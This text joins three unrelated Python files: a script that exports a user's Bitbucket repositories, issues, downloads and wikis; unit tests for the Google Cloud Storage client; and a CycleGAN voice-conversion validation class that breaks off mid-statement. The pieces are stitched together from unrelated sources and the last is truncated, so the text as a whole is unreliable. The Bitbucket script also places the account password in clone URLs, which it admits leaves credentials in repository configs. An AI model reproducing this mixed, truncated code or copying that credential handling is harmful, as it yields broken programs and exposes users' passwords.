# export Mercurial (and git) projects on bitbucket.org to local disk
# Python 3 or Python 2
# Attempts to dump meta data
# pretty much hard coded to username and password - doesn't attempt to use keys or handle 2fa
import logging
import os
import os.path
import subprocess
import sys
import base64
import json
import sys
try:
# Assume Python 3.x
from urllib.error import URLError, HTTPError
from urllib.parse import urlencode
from urllib.request import Request, urlopen
except ImportError:
# Probably Python2
from urllib import urlencode
from urllib2 import Request, urlopen
from urllib2 import URLError, HTTPError
log = logging.getLogger(__name__)
logging.basicConfig()  # TODO include function name/line numbers in log

# Log level selection via the BB_DUMP_DEBUG environment variable
if os.environ.get('BB_DUMP_DEBUG'):
    if os.environ.get('BB_DUMP_DEBUG').lower() == 'info':
        log.setLevel(level=logging.INFO)
    else:
        log.setLevel(level=logging.DEBUG)
# NOTE(review): this unconditional reset to INFO appears to defeat the
# env-var branch above (DEBUG can never stick) — confirm intent
log.setLevel(level=logging.INFO)
def safe_mkdir(newdir):
    """Create *newdir* (and any missing parents), tolerating "already exists"."""
    target = os.path.abspath(newdir)
    try:
        os.makedirs(target)
    except OSError as exc:
        # errno 17 == EEXIST; only swallow it when the path really is a directory
        if not (exc.errno == 17 and os.path.isdir(target)):
            raise
def get_url(url, headers=None):
    """GET *url* and return the raw response body (bytes).

    :param url: URL to fetch
    :param headers: optional dict of HTTP headers (e.g. Authorization)
    :return: response body as bytes
    The response object is always closed, even if read() raises.
    """
    log.debug('get_url=%r', url)
    response = None
    try:
        if headers:
            request = Request(url, headers=headers)
        else:
            request = Request(url)  # may not be needed
        response = urlopen(request)
        # Removed unused locals (geturl()/getcode() results were never read)
        return response.read()
    finally:
        # "is not None" instead of "!= None" — identity check for None
        if response is not None:
            response.close()
def get_url_json(url, headers=None):
    """GET *url* and parse the response body as JSON."""
    raw = get_url(url, headers=headers)
    # Explicit decode keeps pre-3.6 Pythons happy (their json.loads wants str)
    return json.loads(raw.decode("utf-8"))
def get_list(url, headers=None):
    """Collect a full paginated bitbucket 2.0 collection, following 'next' links."""
    page = get_url_json(url, headers=headers)
    values = page['values']
    log.debug('len(values)=%d', len(values))
    while page.get('next'):
        page = get_url_json(page['next'], headers=headers)
        values += page['values']
        log.debug('len(values)=%d', len(values))
    return values
def gen_local_project_dir_name(project_metadata):
    """Map a repository's metadata to a local path: (private|public)/<slug>."""
    visibility = 'private' if project_metadata['is_private'] else 'public'
    return os.path.join(visibility, project_metadata['slug'])
class EasyBitBucketAPI():
    """Minimal Bitbucket 2.0 API client used to export/back up repositories:
    metadata, avatar, issues, downloads, source code and wiki.
    """

    def __init__(self, username, password=None, project_owner=None):
        """
        :param username: Bitbucket account name (required).
        :param password: optional password / app password; when given it is
            used for basic-auth headers and embedded in clone URLs.
        :param project_owner: owner of the repositories; defaults to username.
        """
        # NOTE: the previous default was a `<PASSWORD>` redaction artifact,
        # which is a syntax error; None restores the intended optionality.
        assert username is not None, 'need a username, set OS variable BB_USERNAME'
        project_owner = project_owner or username
        self.repo_info = {'username': username, 'secret': password, 'project_owner': project_owner}
        if password:
            log.warning('password being used, any git repos will contain password in config checkout file!')
            encoded_auth = base64.b64encode("{username}:{secret}".format(**self.repo_info).encode()).decode()
            self.headers = dict([("Authorization", "Basic {}".format(encoded_auth))])
        else:
            self.headers = None

    def dump_project_list(self):
        """Return metadata for all projects owned by ``project_owner``."""
        url = 'https://api.bitbucket.org/2.0/repositories/{project_owner}'.format(**self.repo_info)
        result = get_list(url, headers=self.headers)
        return result

    def dump_project_metadata(self, project_name):
        """Return detailed metadata (description, avatar link, ...) for one project."""
        tmp_repo_info = {'project_name': project_name}
        tmp_repo_info.update(self.repo_info)
        url = 'https://api.bitbucket.org/2.0/repositories/{project_owner}/{project_name}'.format(**tmp_repo_info)
        result = get_url_json(url, headers=self.headers)
        return result

    def dump_project_issues(self, project_slug):
        """Return the project's issue list; [] when the API answers 404.

        A 404 may mean either a bad URL or a project whose issue tracker is
        disabled; the API does not distinguish, so "no issues" is assumed.
        """
        tmp_repo_info = {'project_slug': project_slug}
        tmp_repo_info.update(self.repo_info)
        url = 'https://api.bitbucket.org/2.0/repositories/{project_owner}/{project_slug}/issues'.format(**tmp_repo_info)
        try:
            result = get_list(url, headers=self.headers)
        except HTTPError as error:
            if error.code == 404:
                log.warning('DEBUG dump_project_issues() assuming no issues for export - got 404 for %r', url)
                return []
            # Previously this error path was unreachable because `return []`
            # ran unconditionally; non-404 HTTP errors now propagate.
            log.error('dump_project_issues http error %r', error.code)
            raise
        return result

    def dump_project_downloads(self, project_slug):
        """Return metadata for the project's "downloads" files."""
        tmp_repo_info = {'project_slug': project_slug}
        tmp_repo_info.update(self.repo_info)
        url = 'https://api.bitbucket.org/2.0/repositories/{project_owner}/{project_slug}/downloads'.format(**tmp_repo_info)
        log.debug('dump_project_downloads() %r', url)
        result = get_list(url, headers=self.headers)
        return result

    def dump_project_code(self, project_slug, dest_path, scm_type):
        """Clone the project's source into *dest_path* using hg or git.

        The clone URL embeds the credentials because the URL in the project
        metadata carries no password.
        """
        tmp_repo_info = {'project_slug': project_slug}
        tmp_repo_info.update(self.repo_info)
        clone_url = 'https://{username}:{secret}@bitbucket.org/{project_owner}/{project_slug}'.format(**tmp_repo_info)
        if scm_type == 'hg':
            cmd = ['hg', 'clone', clone_url, dest_path]
        elif scm_type == 'git':
            # An earlier revision also built a `--mirror` clone command but
            # immediately overwrote it; only the plain clone ever ran.
            cmd = ['git', 'clone', clone_url, dest_path]
        else:
            # NotImplemented is a value, not an exception class.
            raise NotImplementedError('unknown scm type %r' % scm_type)
        log.debug('CMD: %s', cmd)
        # Argument list (not a shell string) so the embedded password and
        # paths with spaces/metacharacters are passed safely and portably.
        subprocess.check_call(cmd)

    def dump_project_wiki(self, project_slug, dest_path, scm_type):
        """Clone the project's wiki repository into *dest_path*."""
        tmp_repo_info = {'project_slug': project_slug}
        tmp_repo_info.update(self.repo_info)
        clone_url = 'https://{username}:{secret}@bitbucket.org/{project_owner}/{project_slug}/wiki'.format(**tmp_repo_info)
        if scm_type == 'hg':
            cmd = ['hg', 'clone', clone_url, dest_path]
        elif scm_type == 'git':
            # As in dump_project_code(), the dead `--mirror` variant is gone.
            cmd = ['git', 'clone', clone_url, dest_path]
        else:
            raise NotImplementedError('unknown scm type %r' % scm_type)
        log.debug('CMD: %s', cmd)
        subprocess.check_call(cmd)

    def dump_one_project(self, project_slug):
        """Export everything (metadata, avatar, issues, downloads, code, wiki)
        for one project to the local file system.
        """
        log.info('dump_one_project() project_slug %r', project_slug)
        project_metadata = self.dump_project_metadata(project_slug)
        log.debug('dump_project_metadata() result=%r', project_metadata)
        log.debug('\thas_wiki %r', project_metadata['has_wiki'])
        log.debug('\tavatar %r', project_metadata['links']['avatar'])
        log.debug('\tis_private %r', project_metadata['is_private'])
        dir_name = gen_local_project_dir_name(project_metadata)
        safe_mkdir(dir_name)
        image_filename = dir_name + '.png'  # assume png
        image = get_url(project_metadata['links']['avatar']['href'])
        with open(image_filename, 'wb') as f:
            f.write(image)
        project_issues = self.dump_project_issues(project_slug)
        log.debug('project_issues=%r', project_issues)
        if project_issues:
            # Text mode: json.dump() writes str, which a 'wb' handle rejects.
            with open(os.path.join(dir_name, 'issues.json'), 'w') as f:
                json.dump(project_issues, f)
        project_downloads = self.dump_project_downloads(project_slug)
        log.debug('project_downloads=%r', project_downloads)
        if project_downloads:
            downloads_dirname = os.path.join(dir_name, 'downloads')
            safe_mkdir(downloads_dirname)
            with open(os.path.join(dir_name, 'downloads.json'), 'w') as f:
                json.dump(project_downloads, f)
            for download in project_downloads:
                log.debug('download %r', download)
                download_name = os.path.join(downloads_dirname, download['name'])
                data = get_url(download['links']['self']['href'])
                with open(download_name, 'wb') as f:
                    f.write(data)
        code_dirname = os.path.join(dir_name, 'code')
        result = self.dump_project_code(project_slug, code_dirname, project_metadata['scm'])
        log.debug('result=%r', result)
        if project_metadata.get('has_wiki'):
            wiki_dirname = os.path.join(dir_name, 'wiki')
            result = self.dump_project_wiki(project_slug, wiki_dirname, project_metadata['scm'])
            log.debug('result=%r', result)
        log.info('dump_one_project() complete for %r', project_slug)
def doit():
    """Export every repository owned by the configured Bitbucket account.

    Credentials come from the OS variables BB_USERNAME / BB_PASSWORD.  The
    project list is cached to disk so an interrupted run can be resumed
    without re-querying the API.
    """
    username = os.environ.get('BB_USERNAME')
    password = os.environ.get('BB_PASSWORD')
    r = EasyBitBucketAPI(username, password)
    all_repo_meta_filename = 'all_repos.json'
    if not os.path.exists(all_repo_meta_filename):
        project_list = r.dump_project_list()
        tmp_str = json.dumps(project_list, indent=4)
        # Text mode: json.dumps() returns str, which a 'wb' handle rejects.
        with open(all_repo_meta_filename, 'w') as f:
            f.write(tmp_str)
    else:
        log.info('using cached project_list from file %r', all_repo_meta_filename)
        with open(all_repo_meta_filename, 'r') as f:
            project_list = json.load(f)
    for project in project_list:
        project_name = project['name']
        project_slug = project['slug']
        log.info('project_name %r', project_name)
        r.dump_one_project(project_slug)
    log.warning('any git repos will contain password in config checkout file!')
def main(argv=None):
    """Script entry point; returns a process exit status for sys.exit()."""
    argv = sys.argv if argv is None else argv
    print('Python %s on %s' % (sys.version, sys.platform))
    doit()
    return 0


if __name__ == "__main__":
    sys.exit(main())
|
# Copyright 2015 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import unittest
import mock
import requests
from six.moves import http_client
def _make_credentials():
    """Return a mock satisfying the google-auth Credentials interface."""
    import google.auth.credentials
    spec = google.auth.credentials.Credentials
    return mock.Mock(spec=spec)
def _make_response(status=http_client.OK, content=b'', headers=None):
    """Build a ``requests.Response`` with the given status/content/headers.

    ``headers`` defaults to a fresh empty dict; the previous ``headers={}``
    default was a shared mutable object that later callers could mutate.
    """
    response = requests.Response()
    response.status_code = status
    response._content = content
    response.headers = headers if headers is not None else {}
    response.request = requests.Request()
    return response
def _make_json_response(data, status=http_client.OK, headers=None):
    """JSON-encode *data* into a response flagged as ``application/json``."""
    headers = headers or {}
    headers['Content-Type'] = 'application/json'
    payload = json.dumps(data).encode('utf-8')
    return _make_response(status=status, content=payload, headers=headers)
def _make_requests_session(responses):
    """Return an autospecced Session whose request() replays *responses* in order."""
    fake_session = mock.create_autospec(requests.Session, instance=True)
    fake_session.request.side_effect = responses
    return fake_session
class TestClient(unittest.TestCase):
    """Unit tests for ``google.cloud.storage.client.Client``.

    No network traffic occurs: HTTP is faked by installing an autospecced
    ``requests.Session`` (see ``_make_requests_session``) as the client's
    ``_http_internal`` and asserting on the calls it received.
    """
    @staticmethod
    def _get_target_class():
        # Imported lazily so test collection works without the package.
        from google.cloud.storage.client import Client
        return Client
    def _make_one(self, *args, **kw):
        # Helper: construct the class under test.
        return self._get_target_class()(*args, **kw)
    def test_ctor_connection_type(self):
        from google.cloud.storage._http import Connection
        PROJECT = 'PROJECT'
        CREDENTIALS = _make_credentials()
        client = self._make_one(project=PROJECT, credentials=CREDENTIALS)
        self.assertEqual(client.project, PROJECT)
        self.assertIsInstance(client._connection, Connection)
        self.assertIs(client._connection.credentials, CREDENTIALS)
        self.assertIsNone(client.current_batch)
        self.assertEqual(list(client._batch_stack), [])
    def test__push_batch_and__pop_batch(self):
        # Batches stack LIFO; current_batch always reflects the top.
        from google.cloud.storage.batch import Batch
        PROJECT = 'PROJECT'
        CREDENTIALS = _make_credentials()
        client = self._make_one(project=PROJECT, credentials=CREDENTIALS)
        batch1 = Batch(client)
        batch2 = Batch(client)
        client._push_batch(batch1)
        self.assertEqual(list(client._batch_stack), [batch1])
        self.assertIs(client.current_batch, batch1)
        client._push_batch(batch2)
        self.assertIs(client.current_batch, batch2)
        # list(_LocalStack) returns in reverse order.
        self.assertEqual(list(client._batch_stack), [batch2, batch1])
        self.assertIs(client._pop_batch(), batch2)
        self.assertEqual(list(client._batch_stack), [batch1])
        self.assertIs(client._pop_batch(), batch1)
        self.assertEqual(list(client._batch_stack), [])
    def test__connection_setter(self):
        PROJECT = 'PROJECT'
        CREDENTIALS = _make_credentials()
        client = self._make_one(project=PROJECT, credentials=CREDENTIALS)
        client._base_connection = None  # Unset the value from the constructor
        client._connection = connection = object()
        self.assertIs(client._base_connection, connection)
    def test__connection_setter_when_set(self):
        # Reassigning an already-set connection must raise ValueError.
        PROJECT = 'PROJECT'
        CREDENTIALS = _make_credentials()
        client = self._make_one(project=PROJECT, credentials=CREDENTIALS)
        self.assertRaises(ValueError, setattr, client, '_connection', None)
    def test__connection_getter_no_batch(self):
        PROJECT = 'PROJECT'
        CREDENTIALS = _make_credentials()
        client = self._make_one(project=PROJECT, credentials=CREDENTIALS)
        self.assertIs(client._connection, client._base_connection)
        self.assertIsNone(client.current_batch)
    def test__connection_getter_with_batch(self):
        # With an active batch, _connection resolves to the batch itself.
        from google.cloud.storage.batch import Batch
        PROJECT = 'PROJECT'
        CREDENTIALS = _make_credentials()
        client = self._make_one(project=PROJECT, credentials=CREDENTIALS)
        batch = Batch(client)
        client._push_batch(batch)
        self.assertIsNot(client._connection, client._base_connection)
        self.assertIs(client._connection, batch)
        self.assertIs(client.current_batch, batch)
    def test_bucket(self):
        from google.cloud.storage.bucket import Bucket
        PROJECT = 'PROJECT'
        CREDENTIALS = _make_credentials()
        BUCKET_NAME = 'BUCKET_NAME'
        client = self._make_one(project=PROJECT, credentials=CREDENTIALS)
        bucket = client.bucket(BUCKET_NAME)
        self.assertIsInstance(bucket, Bucket)
        self.assertIs(bucket.client, client)
        self.assertEqual(bucket.name, BUCKET_NAME)
        self.assertIsNone(bucket.user_project)
    def test_bucket_w_user_project(self):
        from google.cloud.storage.bucket import Bucket
        PROJECT = 'PROJECT'
        USER_PROJECT = 'USER_PROJECT'
        CREDENTIALS = _make_credentials()
        BUCKET_NAME = 'BUCKET_NAME'
        client = self._make_one(project=PROJECT, credentials=CREDENTIALS)
        bucket = client.bucket(BUCKET_NAME, user_project=USER_PROJECT)
        self.assertIsInstance(bucket, Bucket)
        self.assertIs(bucket.client, client)
        self.assertEqual(bucket.name, BUCKET_NAME)
        self.assertEqual(bucket.user_project, USER_PROJECT)
    def test_batch(self):
        from google.cloud.storage.batch import Batch
        PROJECT = 'PROJECT'
        CREDENTIALS = _make_credentials()
        client = self._make_one(project=PROJECT, credentials=CREDENTIALS)
        batch = client.batch()
        self.assertIsInstance(batch, Batch)
        self.assertIs(batch._client, client)
    def test_get_bucket_miss(self):
        # A 404 from the API surfaces as NotFound.
        from google.cloud.exceptions import NotFound
        PROJECT = 'PROJECT'
        CREDENTIALS = _make_credentials()
        client = self._make_one(project=PROJECT, credentials=CREDENTIALS)
        NONESUCH = 'nonesuch'
        URI = '/'.join([
            client._connection.API_BASE_URL,
            'storage',
            client._connection.API_VERSION,
            'b',
            'nonesuch?projection=noAcl',
        ])
        http = _make_requests_session([
            _make_json_response({}, status=http_client.NOT_FOUND)])
        client._http_internal = http
        with self.assertRaises(NotFound):
            client.get_bucket(NONESUCH)
        http.request.assert_called_once_with(
            method='GET', url=URI, data=mock.ANY, headers=mock.ANY)
    def test_get_bucket_hit(self):
        from google.cloud.storage.bucket import Bucket
        PROJECT = 'PROJECT'
        CREDENTIALS = _make_credentials()
        client = self._make_one(project=PROJECT, credentials=CREDENTIALS)
        BUCKET_NAME = 'bucket-name'
        URI = '/'.join([
            client._connection.API_BASE_URL,
            'storage',
            client._connection.API_VERSION,
            'b',
            '%s?projection=noAcl' % (BUCKET_NAME,),
        ])
        data = {'name': BUCKET_NAME}
        http = _make_requests_session([_make_json_response(data)])
        client._http_internal = http
        bucket = client.get_bucket(BUCKET_NAME)
        self.assertIsInstance(bucket, Bucket)
        self.assertEqual(bucket.name, BUCKET_NAME)
        http.request.assert_called_once_with(
            method='GET', url=URI, data=mock.ANY, headers=mock.ANY)
    def test_lookup_bucket_miss(self):
        # Unlike get_bucket, lookup_bucket maps a 404 to None.
        PROJECT = 'PROJECT'
        CREDENTIALS = _make_credentials()
        client = self._make_one(project=PROJECT, credentials=CREDENTIALS)
        NONESUCH = 'nonesuch'
        URI = '/'.join([
            client._connection.API_BASE_URL,
            'storage',
            client._connection.API_VERSION,
            'b',
            'nonesuch?projection=noAcl',
        ])
        http = _make_requests_session([
            _make_json_response({}, status=http_client.NOT_FOUND)])
        client._http_internal = http
        bucket = client.lookup_bucket(NONESUCH)
        self.assertIsNone(bucket)
        http.request.assert_called_once_with(
            method='GET', url=URI, data=mock.ANY, headers=mock.ANY)
    def test_lookup_bucket_hit(self):
        from google.cloud.storage.bucket import Bucket
        PROJECT = 'PROJECT'
        CREDENTIALS = _make_credentials()
        client = self._make_one(project=PROJECT, credentials=CREDENTIALS)
        BUCKET_NAME = 'bucket-name'
        URI = '/'.join([
            client._connection.API_BASE_URL,
            'storage',
            client._connection.API_VERSION,
            'b',
            '%s?projection=noAcl' % (BUCKET_NAME,),
        ])
        data = {'name': BUCKET_NAME}
        http = _make_requests_session([_make_json_response(data)])
        client._http_internal = http
        bucket = client.lookup_bucket(BUCKET_NAME)
        self.assertIsInstance(bucket, Bucket)
        self.assertEqual(bucket.name, BUCKET_NAME)
        http.request.assert_called_once_with(
            method='GET', url=URI, data=mock.ANY, headers=mock.ANY)
    def test_create_bucket_conflict(self):
        # A 409 from the API surfaces as Conflict; the POSTed body is checked.
        from google.cloud.exceptions import Conflict
        PROJECT = 'PROJECT'
        CREDENTIALS = _make_credentials()
        client = self._make_one(project=PROJECT, credentials=CREDENTIALS)
        BUCKET_NAME = 'bucket-name'
        URI = '/'.join([
            client._connection.API_BASE_URL,
            'storage',
            client._connection.API_VERSION,
            'b?project=%s' % (PROJECT,),
        ])
        data = {'error': {'message': 'Conflict'}}
        sent = {'name': BUCKET_NAME}
        http = _make_requests_session([
            _make_json_response(data, status=http_client.CONFLICT)])
        client._http_internal = http
        self.assertRaises(Conflict, client.create_bucket, BUCKET_NAME)
        http.request.assert_called_once_with(
            method='POST', url=URI, data=mock.ANY, headers=mock.ANY)
        json_sent = http.request.call_args_list[0][1]['data']
        self.assertEqual(sent, json.loads(json_sent))
    def test_create_bucket_success(self):
        from google.cloud.storage.bucket import Bucket
        PROJECT = 'PROJECT'
        CREDENTIALS = _make_credentials()
        client = self._make_one(project=PROJECT, credentials=CREDENTIALS)
        BUCKET_NAME = 'bucket-name'
        URI = '/'.join([
            client._connection.API_BASE_URL,
            'storage',
            client._connection.API_VERSION,
            'b?project=%s' % (PROJECT,),
        ])
        sent = {'name': BUCKET_NAME, 'billing': {'requesterPays': True}}
        data = sent
        http = _make_requests_session([_make_json_response(data)])
        client._http_internal = http
        bucket = client.create_bucket(BUCKET_NAME, requester_pays=True)
        self.assertIsInstance(bucket, Bucket)
        self.assertEqual(bucket.name, BUCKET_NAME)
        self.assertTrue(bucket.requester_pays)
        http.request.assert_called_once_with(
            method='POST', url=URI, data=mock.ANY, headers=mock.ANY)
        json_sent = http.request.call_args_list[0][1]['data']
        self.assertEqual(sent, json.loads(json_sent))
    def test_list_buckets_empty(self):
        # Query-string parameters are order-independent, so compare parsed.
        from six.moves.urllib.parse import parse_qs
        from six.moves.urllib.parse import urlparse
        PROJECT = 'PROJECT'
        CREDENTIALS = _make_credentials()
        client = self._make_one(project=PROJECT, credentials=CREDENTIALS)
        http = _make_requests_session([_make_json_response({})])
        client._http_internal = http
        buckets = list(client.list_buckets())
        self.assertEqual(len(buckets), 0)
        http.request.assert_called_once_with(
            method='GET', url=mock.ANY, data=mock.ANY, headers=mock.ANY)
        requested_url = http.request.mock_calls[0][2]['url']
        expected_base_url = '/'.join([
            client._connection.API_BASE_URL,
            'storage',
            client._connection.API_VERSION,
            'b',
        ])
        self.assertTrue(requested_url.startswith(expected_base_url))
        expected_query = {
            'project': [PROJECT],
            'projection': ['noAcl'],
        }
        uri_parts = urlparse(requested_url)
        self.assertEqual(parse_qs(uri_parts.query), expected_query)
    def test_list_buckets_non_empty(self):
        PROJECT = 'PROJECT'
        CREDENTIALS = _make_credentials()
        client = self._make_one(project=PROJECT, credentials=CREDENTIALS)
        BUCKET_NAME = 'bucket-name'
        data = {'items': [{'name': BUCKET_NAME}]}
        http = _make_requests_session([_make_json_response(data)])
        client._http_internal = http
        buckets = list(client.list_buckets())
        self.assertEqual(len(buckets), 1)
        self.assertEqual(buckets[0].name, BUCKET_NAME)
        http.request.assert_called_once_with(
            method='GET', url=mock.ANY, data=mock.ANY, headers=mock.ANY)
    def test_list_buckets_all_arguments(self):
        # Every optional list_buckets parameter must appear in the query.
        from six.moves.urllib.parse import parse_qs
        from six.moves.urllib.parse import urlparse
        PROJECT = 'foo-bar'
        CREDENTIALS = _make_credentials()
        client = self._make_one(project=PROJECT, credentials=CREDENTIALS)
        MAX_RESULTS = 10
        PAGE_TOKEN = 'ABCD'
        PREFIX = 'subfolder'
        PROJECTION = 'full'
        FIELDS = 'items/id,nextPageToken'
        data = {'items': []}
        http = _make_requests_session([_make_json_response(data)])
        client._http_internal = http
        iterator = client.list_buckets(
            max_results=MAX_RESULTS,
            page_token=PAGE_TOKEN,
            prefix=PREFIX,
            projection=PROJECTION,
            fields=FIELDS,
        )
        buckets = list(iterator)
        self.assertEqual(buckets, [])
        http.request.assert_called_once_with(
            method='GET', url=mock.ANY, data=mock.ANY, headers=mock.ANY)
        requested_url = http.request.mock_calls[0][2]['url']
        expected_base_url = '/'.join([
            client._connection.API_BASE_URL,
            'storage',
            client._connection.API_VERSION,
            'b',
        ])
        self.assertTrue(requested_url.startswith(expected_base_url))
        expected_query = {
            'project': [PROJECT],
            'maxResults': [str(MAX_RESULTS)],
            'pageToken': [PAGE_TOKEN],
            'prefix': [PREFIX],
            'projection': [PROJECTION],
            'fields': [FIELDS],
        }
        uri_parts = urlparse(requested_url)
        self.assertEqual(parse_qs(uri_parts.query), expected_query)
    def test_page_empty_response(self):
        from google.api_core import page_iterator
        project = 'PROJECT'
        credentials = _make_credentials()
        client = self._make_one(project=project, credentials=credentials)
        iterator = client.list_buckets()
        page = page_iterator.Page(iterator, (), None)
        iterator._page = page
        self.assertEqual(list(page), [])
    def test_page_non_empty_response(self):
        import six
        from google.cloud.storage.bucket import Bucket
        project = 'PROJECT'
        credentials = _make_credentials()
        client = self._make_one(project=project, credentials=credentials)
        blob_name = 'bucket-name'
        response = {'items': [{'name': blob_name}]}
        # Bypass HTTP entirely by stubbing the page-fetch hook.
        def dummy_response():
            return response
        iterator = client.list_buckets()
        iterator._get_next_page_response = dummy_response
        page = six.next(iterator.pages)
        self.assertEqual(page.num_items, 1)
        bucket = six.next(page)
        self.assertEqual(page.remaining, 0)
        self.assertIsInstance(bucket, Bucket)
        self.assertEqual(bucket.name, blob_name)
|
#! python
# -*- coding: utf-8 -*-
# Author: kun
# @Time: 2019-07-23 14:25
import os
import numpy as np
import argparse
import torch
import time
import librosa
import pickle
import preprocess
from trainingDataset import trainingDataset
from model_tf import Generator, Discriminator
from tqdm import tqdm
import soundfile as sf
# Pin this process to the first GPU; must be set before any CUDA context
# is created (i.e. before torch touches the device).
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
class CycleGANTraining(object):
    """Holds CycleGAN-VC generators/discriminators plus per-speaker speech
    statistics, and converts held-out wavs between speakers A and B.

    Only the validation/conversion path is present in this excerpt;
    ``coded_sps_A_norm``/``coded_sps_B_norm`` and ``restart_training_at``
    are accepted for interface compatibility but unused here.
    """

    def __init__(self,
                 logf0s_normalization,
                 mcep_normalization,
                 coded_sps_A_norm,
                 coded_sps_B_norm,
                 model_checkpoint,
                 validation_A_dir,
                 output_A_dir,
                 validation_B_dir,
                 output_B_dir,
                 restart_training_at=None):
        # NOTE(review): assumes a CUDA device is available — confirm, since
        # the conversion loop below also has a CPU fallback.
        self.device = torch.device('cuda')
        # Per-speaker log-f0 statistics used for pitch conversion.
        logf0s_normalization = np.load(logf0s_normalization)
        self.log_f0s_mean_A = logf0s_normalization['mean_A']
        self.log_f0s_std_A = logf0s_normalization['std_A']
        self.log_f0s_mean_B = logf0s_normalization['mean_B']
        self.log_f0s_std_B = logf0s_normalization['std_B']
        # Per-speaker MCEP statistics for spectral (de)normalization.
        mcep_normalization = np.load(mcep_normalization)
        self.coded_sps_A_mean = mcep_normalization['mean_A']
        self.coded_sps_A_std = mcep_normalization['std_A']
        self.coded_sps_B_mean = mcep_normalization['mean_B']
        self.coded_sps_B_std = mcep_normalization['std_B']
        # Generators and discriminators for both conversion directions.
        self.generator_A2B = Generator().to(self.device)
        self.generator_B2A = Generator().to(self.device)
        self.discriminator_A = Discriminator().to(self.device)
        self.discriminator_B = Discriminator().to(self.device)
        self.modelCheckpoint = model_checkpoint
        os.makedirs(self.modelCheckpoint, exist_ok=True)
        # Validation set parameters.
        self.validation_A_dir = validation_A_dir
        self.output_A_dir = output_A_dir
        os.makedirs(self.output_A_dir, exist_ok=True)
        self.validation_B_dir = validation_B_dir
        self.output_B_dir = output_B_dir
        os.makedirs(self.output_B_dir, exist_ok=True)
        # Generator/discriminator loss history and log file name.
        self.generator_loss_store = []
        self.discriminator_loss_store = []
        self.file_name = 'log_store_non_sigmoid.txt'

    def _convert_directory(self, input_dir, output_dir, generator,
                           f0_mean_src, f0_std_src, f0_mean_tgt, f0_std_tgt,
                           sp_mean_src, sp_std_src, sp_mean_tgt, sp_std_tgt,
                           banner):
        """Convert every wav in *input_dir* with *generator*, writing results
        to *output_dir*.

        Shared implementation of ``validation_for_A_dir`` and
        ``validation_for_B_dir``, which previously duplicated this loop
        line for line (differing only in direction-specific statistics).
        """
        num_mcep = 36
        sampling_rate = 16000
        frame_period = 5.0
        print(banner)
        for wav_name in os.listdir(input_dir):
            wav_path = os.path.join(input_dir, wav_name)
            wav, _ = librosa.load(wav_path, sr=sampling_rate, mono=True)
            # Pad so the frame count is a multiple of 4 (matches the
            # generator's down/upsampling factor).
            wav = preprocess.wav_padding(wav=wav,
                                         sr=sampling_rate,
                                         frame_period=frame_period,
                                         multiple=4)
            f0, timeaxis, sp, ap = preprocess.world_decompose(
                wav=wav, fs=sampling_rate, frame_period=frame_period)
            # Log-Gaussian normalized f0 transformation source -> target.
            f0_converted = preprocess.pitch_conversion(
                f0=f0,
                mean_log_src=f0_mean_src,
                std_log_src=f0_std_src,
                mean_log_target=f0_mean_tgt,
                std_log_target=f0_std_tgt)
            coded_sp = preprocess.world_encode_spectral_envelop(
                sp=sp, fs=sampling_rate, dim=num_mcep)
            # Normalize with the *source* speaker statistics, add batch dim.
            coded_sp_norm = (coded_sp.T - sp_mean_src) / sp_std_src
            coded_sp_norm = np.array([coded_sp_norm])
            if torch.cuda.is_available():
                coded_sp_norm = torch.from_numpy(coded_sp_norm).cuda().float()
            else:
                coded_sp_norm = torch.from_numpy(coded_sp_norm).float()
            converted_norm = generator(coded_sp_norm)
            converted_norm = converted_norm.cpu().detach().numpy()
            converted_norm = np.squeeze(converted_norm)
            # De-normalize with the *target* speaker statistics.
            coded_sp_converted = converted_norm * sp_std_tgt + sp_mean_tgt
            coded_sp_converted = np.ascontiguousarray(coded_sp_converted.T)
            decoded_sp_converted = preprocess.world_decode_spectral_envelop(
                coded_sp=coded_sp_converted, fs=sampling_rate)
            wav_transformed = preprocess.world_speech_synthesis(
                f0=f0_converted,
                decoded_sp=decoded_sp_converted,
                ap=ap,
                fs=sampling_rate,
                frame_period=frame_period)
            sf.write(os.path.join(output_dir, os.path.basename(wav_name)),
                     wav_transformed, sampling_rate, 'PCM_24')

    def validation_for_A_dir(self):
        """Convert every validation wav of speaker A to speaker B."""
        self._convert_directory(
            self.validation_A_dir, self.output_A_dir, self.generator_A2B,
            self.log_f0s_mean_A, self.log_f0s_std_A,
            self.log_f0s_mean_B, self.log_f0s_std_B,
            self.coded_sps_A_mean, self.coded_sps_A_std,
            self.coded_sps_B_mean, self.coded_sps_B_std,
            "Generating Validation Data B from A...")

    def validation_for_B_dir(self):
        """Convert every validation wav of speaker B to speaker A."""
        self._convert_directory(
            self.validation_B_dir, self.output_B_dir, self.generator_B2A,
            self.log_f0s_mean_B, self.log_f0s_std_B,
            self.log_f0s_mean_A, self.log_f0s_std_A,
            self.coded_sps_B_mean, self.coded_sps_B_std,
            self.coded_sps_A_mean, self.coded_sps_A_std,
            "Generating Validation Data A from B...")
if __name__ == '__main__':
    parser = argparse.ArgumentParser(
        description="Train CycleGAN using source dataset and target dataset")

    # Default cache/checkpoint/data locations, overridable on the CLI.
    logf0s_normalization_default = './cache/logf0s_normalization.npz'
    mcep_normalization_default = './cache/mcep_normalization.npz'
    coded_sps_A_norm = './cache/coded_sps_A_norm.pickle'
    coded_sps_B_norm = './cache/coded_sps_B_norm.pickle'
    model_checkpoint = './model_checkpoint/'
    resume_training_at = './model_checkpoint/_CycleGAN_CheckPoint'
    validation_A_dir_default = './data/inputA/'
    output_A_dir_default = './converted_sound/inputA'
    validation_B_dir_default = './data/inputB/'
    output_B_dir_default = './converted_sound/inputB/'

    parser.add_argument('--logf0s_normalization', type=str,
                        help="Cached location for log f0s normalized", default=logf0s_normalization_default)
    parser.add_argument('--mcep_normalization', type=str,
                        help="Cached location for mcep normalization", default=mcep_normalization_default)
    parser.add_argument('--coded_sps_A_norm', type=str,
                        help="mcep norm for data A", default=coded_sps_A_norm)
    parser.add_argument('--coded_sps_B_norm', type=str,
                        help="mcep norm for data B", default=coded_sps_B_norm)
    parser.add_argument('--model_checkpoint', type=str,
                        help="location where you want to save the model", default=model_checkpoint)
    parser.add_argument('--resume_training_at', type=str,
